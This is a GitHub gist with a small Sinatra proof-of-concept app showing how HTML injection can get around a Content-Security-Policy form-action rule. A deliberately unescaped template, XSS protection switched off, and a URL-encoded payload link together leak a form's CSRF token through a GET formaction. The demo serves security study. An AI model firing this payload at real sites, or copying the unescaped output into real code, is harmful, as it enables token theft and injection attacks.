Skip to content

Instantly share code, notes, and snippets.

@kazu69
Last active September 12, 2016 16:09
Embed
What would you like to do?
Bypassa CSP form-action XSS example

Bypassa CSP form-action XSS example

try

bundle install
bundle exec ruby app.rb

[2016-09-10 00:01:46] INFO  WEBrick 1.3.1
[2016-09-10 00:01:46] INFO  ruby 2.2.2 (2015-04-13) [x86_64-darwin15]
== Sinatra (v1.4.7) has taken the stage on 4567 for development with backup from WEBrick
[2016-09-10 00:01:46] INFO  WEBrick::HTTPServer#start: pid=26211 port=4567

open http://localhost:4567
routes content
GET / Bypassa CSP form-action XSS example
GET /csp_report_example/ confirmation csp report is sending
GET /apper_form_value/ html injection is the example

more

require 'sinatra'
require 'slim'
require 'json'
before do
headers \
'Content-Security-Policy' => "default-src 'self'; form-action 'self'; report-uri /csp-reports/",
'X-XSS-Protection' => '0' # 1(enable)の場合はinjectionは発火しない
end
get '/' do
slim :index
end
# csp のエラーレポートが報告されることを確認
get '/csp_report_example/' do
slim :unsafe
end
# injectionされるとtokenがURLパラメーターに出力
get '/apper_form_value/' do
slim :apper_form_value
end
post '/subscribe/' do
logger.info 'subscribed'
end
# csp report送信先
post '/csp-reports/' do
params = JSON.parse request.body.read
logger.info params
end
__END__
@@ layout
html
== yield
@@ index
/ escapeしないで出力
== params['xss']
form[method="POST" action="/subscribe/" id="subscribe"]
input[type="hidden" name="csrftoken" value="randomcsrftoken"]
input[type="submit" value="scubscribe"]
br
| <a href="/?xss=%3Cinput%20value%3D%22Click%20Me%22%20type%3D%22submit%22%20formaction%3D%22%22%20form%3D%22subscribe%22%20formmethod%3D%22get%22%20%2F%3E%3Cinput%20type%3D%22hidden%22%20value%3D%22%3Cmeta%20name%3D%27referrer%27%20content%3D%27always%27%3E%22%3E">XSS</a>
@@ csp_report_example
form[method="POST" action="http://google.com/" id="subscribe"]
input[type="hidden" name="csrftoken" value="randomcsrftoken"]
input[type="submit" value="scubscribe"]
@@ apper_form_value
| <div><form action=”http://github.com/"></div>
form[method="POST" action="/subscribe/" id="subscribe"]
input[type="hidden" name="csrftoken" value="randomcsrftoken"]
input[type="submit" value="scubscribe"]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment